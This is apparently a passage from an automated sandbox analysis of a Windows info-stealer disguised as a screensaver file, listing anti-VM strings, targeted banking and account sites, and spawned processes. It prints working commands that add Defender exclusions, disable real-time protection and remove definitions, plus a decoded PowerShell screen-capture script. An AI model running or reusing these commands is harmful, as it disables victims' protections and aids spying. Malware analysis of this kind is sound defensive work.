              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af\Jump to behavior
              Source: getmac.exe, 00000031.00000003.2151790983.0000020D5DEAD000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2152634842.0000020D5DEAE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: g#jdfecodevmware
              Source: getmac.exe, 00000031.00000003.2151790983.0000020D5DEAD000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2152634842.0000020D5DEAE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: getmac.exe, 00000031.00000003.2151790983.0000020D5DEAD000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2152634842.0000020D5DEAE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW!
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: getmac.exe, 00000031.00000002.2152634842.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"h
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: d2qemu-ga
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWncel%SystemRoot%\system32\mswsock.dlltative host not found.
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware)
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f8vmusrvc
              Source: getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-VT
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2150926613.0000028C88DAD000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322447495.0000028C88B6F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163848479.0000028C87C28000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163106879.0000028C88B6F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2153913048.0000028C88B6D000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323961811.0000028C88B6F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154463139.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fecodevmsrvc
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: getmac.exe, 00000031.00000002.2152634842.0000020D5DEC1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151715495.0000020D5DEBE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: getmac.exe, 00000031.00000002.2152634842.0000020D5DEC1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151715495.0000020D5DEBE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicera
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE2ABD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF73AE2ABD8
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86A7B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FF8A86A7B30
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE33AF0 GetProcessHeap,0_2_00007FF73AE33AF0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE2ABD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF73AE2ABD8
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE1BCE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF73AE1BCE0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE1C760 SetUnhandledExceptionFilter,0_2_00007FF73AE1C760
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE1C57C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF73AE1C57C
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8093068 IsProcessorFeaturePresent,00007FF8BA251730,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8BA251730,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8A8093068
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeCode function: 68_2_00007FF7F7EDB6D8 SetUnhandledExceptionFilter,68_2_00007FF7F7EDB6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeCode function: 68_2_00007FF7F7EDA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,68_2_00007FF7F7EDA66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeCode function: 68_2_00007FF7F7EDB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_00007FF7F7EDB52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeCode function: 68_2_00007FF7F7EE4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_00007FF7F7EE4C10

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'"
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
